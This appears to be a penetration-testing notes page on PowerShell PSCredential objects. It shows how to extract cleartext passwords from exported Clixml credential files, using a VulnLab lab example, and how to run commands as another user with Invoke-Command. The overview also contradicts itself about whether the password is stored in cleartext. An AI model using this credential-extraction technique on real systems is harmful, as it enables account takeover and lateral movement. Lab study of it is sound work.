πΎ Overview
PowerShell Credential Objects, or PSCredentials, are objects which βsecurelyβ stores a username and password for a user. The password is stored in cleartext, and the password is stored in a SecureString which is easily converted to cleartext. These objects can be used to execute commands as a given user, but they can also be stored in files allowing you to extract the underlying username/password.
π Extracting Credentials from XML
PSCredentials can be exported to an XML file with the Export-Clixml
commandlet, which exports the username in cleartext, and a representation of the SecureString password.
Hereβs an example file from the chain Lustrous on VulnLab for the local administrator on the machine LUSMS
:
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">LUSMS\Administrator</S>
<SS N="Password">[SNIPPED]</SS>
</Props>
</Obj>
</Objs>
To extract the password we need to load this file as a PSCredential Object, and use GetNetworkCredential
to display the password.
# 1. Load the file as a Credential Object
$credObject = Import-Clixml -Path .\[Your XML File].xml
# 2. Display the username and password
$credObject.GetNetworkCredential() | fl
Example output:
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $credObject.GetNetworkCredential() | fl
UserName : Administrator
Password : [SNIPPED]
SecurePassword : System.Security.SecureString
Domain : LUSMS
π·ββ Creating a PSCredential
PSCredentials can be created using the Get-Credential
commandlet. Usually this prompts for a password, but this can be avoided by converting it to a SecureString.
# Prompts for password
$credObject = Get-Credential -credential [USERNAME]
# Doesn't prompt for password
$password = "[PASSWORD]" | ConvertTo-SecureString -AsPlainText -Force\
$credObject = New-Object System.Management.Automation.PSCredential ('[USERNAME]', $password)
β¨ Using PSCredentials
Alternatively, PSCredentials can be passed to other commandlets to execute them as a given user. Many commandlets have the -Credential
object which will allow you to execute a commandlet using that credential object.
Invoke-Command
is uniquely useful because it will allow you to use a PSCredential on either a local or remote machine to run a command.
# Running 'whoami' with a credential on localhost
Invoke-Command -ComputerName "localhost" -Credential $credObject -ScriptBlock { whoami }
# Running 'whoami' with a credential on a remote machine
Invoke-Command -ComputerName "[HOSTNAME or IP]" -Credential $credObject -ScriptBlock { whoami }
π Resources
π Hyperlink | βΉοΈ Info |
---|---|
Microsoft Learn | Export-Clixml usage. |
Microsoft Learn | Get-Credential usage. |